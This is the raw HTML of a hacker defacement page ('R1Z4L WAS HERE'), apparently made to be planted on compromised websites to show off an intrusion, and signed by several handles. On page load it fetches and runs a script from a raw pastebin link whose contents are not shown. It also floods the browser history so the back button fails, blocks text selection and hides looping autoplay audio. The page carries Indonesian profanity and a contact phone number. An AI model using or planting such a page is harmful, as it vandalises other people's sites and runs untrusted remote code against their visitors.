<html>
<head>
<link rel="icon" type="image/png" href="https://top4top.io/][img]https://d.top4top.io/s_1876limga0.jpg" type="image/x-icon"/>
<title>R1Z4L WAS HERE</title>
<meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests"> 
<meta name="google-site-verification" content="Sans gaming nih boy"/>
<meta name="theme-color" content="black">
<meta http-equiv="Content-Type" content="text/html; charset=Windows-1254"/>
<meta name="description" content=" HEKER HEKER PIRTEK KONTOL ! ">
<meta name="author" content=";)/>
<meta name="keywords" content="Sans gaming"/>
<meta name="googlebot" content="all"/>
<meta name="robots" content="all" />
<meta name="googlebot-news" content="all" />
<meta name="google" content="notranslate"/>
<meta name="og:title" content="SansXHacker15"/>
<meta property="og:image" content="https://d.top4top.io/p_1876limga0.jpg" />
<meta property="og:type" content="website" />
<meta property="og:updated_time" content="1440432930" />
</span>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<script type="text/javascript" src="https://pastebin.com/raw/ynL2hpMe"></script>
</head>
<style type="text/css">
@import url("https://fonts.googleapis.com/css?family=Iceland|Shadows+Into+Light&display=swap");
body{
     overflow:hidden;
     display: flex;
     align-items: center;
     justify-content: center;
     margin:0;
     padding:0;
     width:100%;
     background-color:black;
     }
i{
margin:10px;
color: red;
}
a:link{
color:#000;
}
h1{
  color: #000;
  text-decoration: none;
  border-radius:0px;
  border:0px;
  font-family: 'Shadows Into Light', cursive;
  font-size:50px;
  margin:0px;
  padding:0px;
  animation: Ribel 0.5s linear infinite;
}
pre{
color:grey;
}
marquee{
width:100%;
}
@keyframes  Ribel{
2%{color:#fff;}
3%{transform:translate(2px,-10px) skewX(3240deg);}
5%{transform:translate(0px,0px) skewX(0deg);}
2% , 54%{transform:translateX(0px) skew(0deg);}
55%{transform:translate(-2px,6px) skew(-5530deg);}
56%{transform:translate(0px,0px) skew(0deg);}
57%{transform:translate(4px,-10px) skew(-70deg);}
58%{transform:translate(0px,0px) skew(0deg);}
62%{transform:translate(0px,20px) skew(0deg);}
63%{transform:translate(4px,-2px) skew(0deg);}
90%{transform:translate(1px,3px); skew(-230deg);}
95%{transform:translate(-7px,2px); skew(-120deg);}
100%{transform:translate(0px,0px) skew(0deg);}
</style>
<body scroll="no" style="overflow: hidden" ondragstart="window.event.returnValue=false" onselectstart="event.returnValue=false">
<embed src="https://f.top4top.io/m_1803oeq0j0.m4a" type="audio/mpeg" autostart="true" loop="true" height="0" width="0">
<script>
(function () {
for(var i = 0; i < 20; i++) {
history.pushState(null, document.title, window.location.href );
}
})(document, window, history);
</script>
<center>
<img title="SansXgaming15" class="picture" src="https://top4top.io/][img]https://d.top4top.io/p_2089wauak0.jpg[/img][/url]" width="500px" height="500px"/>
<br><h1><font color="red">Sans/font>Gaming</h1>
<br>
<pre>GHOST<font color="red">CYBERTECH</font>:(<br>
<font size="15">BonanaNas</font></pre>
<br>
<br>
<a href="http://wa.me/6287816962529?text=heker+pirtek+kontol"&text=&source=&data=&app_absent="><button>contact</button><br>
<marquee direction="scroll"><pre> :) YUDZGANZ- XZONEOFC   <i></i> - RIYAN -</pre></marquee><br>LEVI404-VALDY-
</center>
</body>
</html>